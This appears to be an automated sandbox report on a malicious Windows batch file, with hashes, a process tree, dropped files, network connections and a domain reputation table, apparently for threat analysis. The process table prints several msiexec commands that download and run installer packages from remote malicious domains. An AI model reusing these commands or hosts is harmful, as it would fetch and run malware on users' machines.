File name: | mlw_msiexec.bat |
Full analysis: | https://app.any.run/tasks/29d5d556-9b8b-46aa-b83a-ca9e40d950e5 |
Verdict: | Malicious activity |
Analysis date: | May 20, 2019, 14:34:13 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with CRLF line terminators |
MD5: | 8089B31551B33498458E0B1E585266C1 |
SHA1: | 3E0C117CEF303BEF648CEB8B9CB5CE8E8CAB834E |
SHA256: | FE3D88D5AB4D3FE56A6D311F87A8C72C0B36E4F942FE8649076197C42128BAC8 |
SSDEEP: | 12:tPt92u926SY92Z92ghMYYciaCbyaevrCbZCbYB:tHjkgq1svJEg |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
880 | cmd /c ""C:\Users\admin\Desktop\mlw_msiexec.bat" " | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1603 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3900 | c:\windows\system32\msiexec.exe -package https://refreshnerer711rb.info/cltpMxmE8.65s | c:\windows\system32\msiexec.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 1603 Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
3468 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | services.exe | |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
2932 | C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe | — | services.exe |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft® Volume Shadow Copy Service Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2384 | DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot18" "" "" "6792c44eb" "00000000" "00000304" "000005C4" | C:\Windows\system32\DrvInst.exe | — | svchost.exe |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Driver Installation Module Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2956 | C:\Windows\system32\MsiExec.exe -Embedding E13C7699CA185F52570F46DC51BBA40E | C:\Windows\system32\MsiExec.exe | — | msiexec.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
1740 | c:\windows\system32\msiexec.exe -package https://superdomain1709.info/geeuier.foa | c:\windows\system32\msiexec.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 1603 Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
1484 | DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "00000000" "000004D8" "00000304" | C:\Windows\system32\DrvInst.exe | — | svchost.exe |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Driver Installation Module Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2568 | C:\Windows\system32\MsiExec.exe -Embedding 9F85AD8E12F85ED7B2B61649D4E9B7AA | C:\Windows\system32\MsiExec.exe | — | msiexec.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
856 | c:\windows\system32\msiexec.exe -package https://superdomain1709.info/kaebhgp.jng | c:\windows\system32\msiexec.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 1603 Version: 5.0.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3468 | msiexec.exe | C:\System Volume Information\SPP\metadata-2 | — | |
MD5:— | SHA256:— | |||
3900 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\MSI238E.tmp | executable | |
MD5:3DD7F786EC0AA5E4EC428D4E05962142 | SHA256:A999262EBE9EE628EFA115E2CDE2A97DEEA2122B1227126782288EC9B678709B | |||
3468 | msiexec.exe | C:\System Volume Information\SPP\OnlineMetadataCache\{6172b762-3bbb-461e-a4f2-f771fb492e2f}_OnDiskSnapshotProp | binary | |
MD5:3A2A5FA8504EE9BA9A633125CF2344E9 | SHA256:85056AB7AE1C560051BCE4577045F14DFBA7E70AD0E326249E4ABCC76236091C | |||
3468 | msiexec.exe | C:\Windows\Installer\MSI2831.tmp | executable | |
MD5:3DD7F786EC0AA5E4EC428D4E05962142 | SHA256:A999262EBE9EE628EFA115E2CDE2A97DEEA2122B1227126782288EC9B678709B | |||
3468 | msiexec.exe | C:\System Volume Information\SPP\snapshot-2 | binary | |
MD5:3A2A5FA8504EE9BA9A633125CF2344E9 | SHA256:85056AB7AE1C560051BCE4577045F14DFBA7E70AD0E326249E4ABCC76236091C | |||
2384 | DrvInst.exe | C:\Windows\INF\setupapi.ev1 | binary | |
MD5:E54B52DDBB254D04F7FCB86C62B55319 | SHA256:77FF4E94624FFEFA79866C42223A618E23A35FCD7644F3BA7172D7E952A795AB | |||
2384 | DrvInst.exe | C:\Windows\INF\setupapi.dev.log | ini | |
MD5:7B98D4D2FA6D5221F28FDC2DC29C3E52 | SHA256:3E56934869FAFCBEACDAC1037A93FCB0A3C3925BABD25BEBC507E8542AA5A450 | |||
2384 | DrvInst.exe | C:\Windows\INF\setupapi.ev3 | binary | |
MD5:76DCC60F78B3DFF1AE3627619074F465 | SHA256:18541AC1875315C4F9EFF75050C574FAFF83717C029DAE6B366F9C6C3F0C19E0 | |||
3468 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DF0F5D5D757B33C435.TMP | — | |
MD5:— | SHA256:— | |||
3468 | msiexec.exe | C:\Config.Msi\1262f9.rbs | — | |
MD5:— | SHA256:— |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3468 | msiexec.exe | 104.18.56.47:443 | superdomain711.info | Cloudflare Inc | US | shared |
3468 | msiexec.exe | 104.18.53.93:443 | refreshnerer711rb.info | Cloudflare Inc | US | shared |
3900 | msiexec.exe | 104.18.56.47:443 | superdomain711.info | Cloudflare Inc | US | shared |
3900 | msiexec.exe | 104.18.53.93:443 | refreshnerer711rb.info | Cloudflare Inc | US | shared |
1352 | msiexec.exe | 104.27.161.100:443 | superdomain1709.info | Cloudflare Inc | US | shared |
856 | msiexec.exe | 104.27.161.100:443 | superdomain1709.info | Cloudflare Inc | US | shared |
3468 | msiexec.exe | 104.27.161.100:443 | superdomain1709.info | Cloudflare Inc | US | shared |
3468 | msiexec.exe | 104.18.52.207:443 | refreshnerer711.info | Cloudflare Inc | US | shared |
1740 | msiexec.exe | 104.27.161.100:443 | superdomain1709.info | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
refreshnerer711rb.info |
| malicious |
superdomain711.info |
| suspicious |
superdomain1709.info |
| unknown |
refreshnerer711.info |
| suspicious |